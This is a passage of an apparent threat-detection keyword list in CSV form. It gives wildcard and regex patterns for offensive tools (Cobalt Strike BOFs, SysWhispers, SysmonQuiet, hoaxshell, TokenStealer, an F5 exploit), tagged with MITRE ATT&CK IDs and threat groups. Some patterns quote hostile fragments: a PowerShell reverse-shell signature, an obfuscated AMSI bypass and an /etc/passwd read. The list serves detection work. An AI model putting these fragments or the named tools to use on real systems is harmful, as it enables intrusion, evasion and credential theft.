- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallsinject.x64*",".{0,1000}syscallsinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*syscallsspawn.x64*",".{0,1000}syscallsspawn\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" 
"*syscallStuff.asm*",".{0,1000}syscallStuff\.asm.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*sysdream/ligolo*",".{0,1000}sysdream\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*Sysmon is being suffocated*",".{0,1000}Sysmon\sis\sbeing\ssuffocated.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*Sysmon is quiet now!*",".{0,1000}Sysmon\sis\squiet\snow!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*sysmonquiet.*",".{0,1000}sysmonquiet\..{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" 
"*SysmonQuiet-main*",".{0,1000}SysmonQuiet\-main.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*SySS-Research*",".{0,1000}SySS\-Research.{0,1000}","offensive_tool_keyword","Github Username","github repo Open source IT security software tools and information and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SySS-Research","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SySS-Research/Seth*",".{0,1000}SySS\-Research\/Seth.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*system rm -f /current/tmp/ftshell.latest*",".{0,1000}system\srm\s\-f\s\/current\/tmp\/ftshell\.latest.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*System token is copied to the current process. 
Executing cmd.exe..*",".{0,1000}System\stoken\sis\scopied\sto\sthe\scurrent\sprocess\.\sExecuting\scmd\.exe\.\..{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D",".{0,1000}System\.DirectoryServices\.AccountManagement\.GroupPrincipal.{0,1000}FindByIdentity.{0,1000}D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration - domain admins","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*'System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls'*",".{0,1000}\'System\.Ma\'\+\'nag\'\+\'eme\'\+\'nt\.Autom\'\+\'ation\.A\'\+\'ms\'\+\'iU\'\+\'ti\'\+\'ls\'.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*System.Net.Sockets.TCPClient*GetStream()*iex*Out-String*",".{0,1000}System\.Net\.Sockets\.TCPClient.{0,1000}GetStream\(\).{0,1000}iex.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*SYSTEM\CurrentControlSet\Services\dcrypt*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\dcrypt.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*System32fileWritePermissions.txt*",".{0,1000}System32fileWritePermissions\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*systemctl disable IMDS*",".{0,1000}systemctl\sdisable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl enable IMDS*",".{0,1000}systemctl\senable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl start IMDS*",".{0,1000}systemctl\sstart\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted 
on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl start nessusd*",".{0,1000}systemctl\sstart\snessusd.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*systemctl status IMDS*",".{0,1000}systemctl\sstatus\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*systemctl stop IMDS*",".{0,1000}systemctl\sstop\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*SysWhispers.git *",".{0,1000}SysWhispers\.git\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*SysWhispers2*",".{0,1000}SysWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*syswhispersv2_x86*",".{0,1000}syswhispersv2_x86.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - 
T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*szymon1118/logon_backdoor*",".{0,1000}szymon1118\/logon_backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*-t * -x lfr -f /etc/passwd*",".{0,1000}\-t\s.{0,1000}\s\-x\slfr\s\-f\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z" "*-t * -x rce -a list+auth+user+admin*",".{0,1000}\-t\s.{0,1000}\s\-x\srce\s\-a\slist\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z" "*t.me/Melteddd*",".{0,1000}t\.me\/Melteddd.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*-t: force use of Impersonation Privilege*",".{0,1000}\-t\:\sforce\suse\sof\sImpersonation\sPrivilege.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" 
"*T0XlCv1.rule*",".{0,1000}T0XlCv1\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*T1esh0u/SecScanC2*",".{0,1000}T1esh0u\/SecScanC2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*t3l3machus/BabelStrike*",".{0,1000}t3l3machus\/BabelStrike.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*t3l3machus/hoaxshell*",".{0,1000}t3l3machus\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*t3l3machus/Synergy-httpx*",".{0,1000}t3l3machus\/Synergy\-httpx.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*TailorScan.exe *",".{0,1000}TailorScan\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_darwin*",".{0,1000}TailorScan_darwin.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_freebsd*",".{0,1000}TailorScan_freebsd.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_linux_*",".{0,1000}TailorScan_linux_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 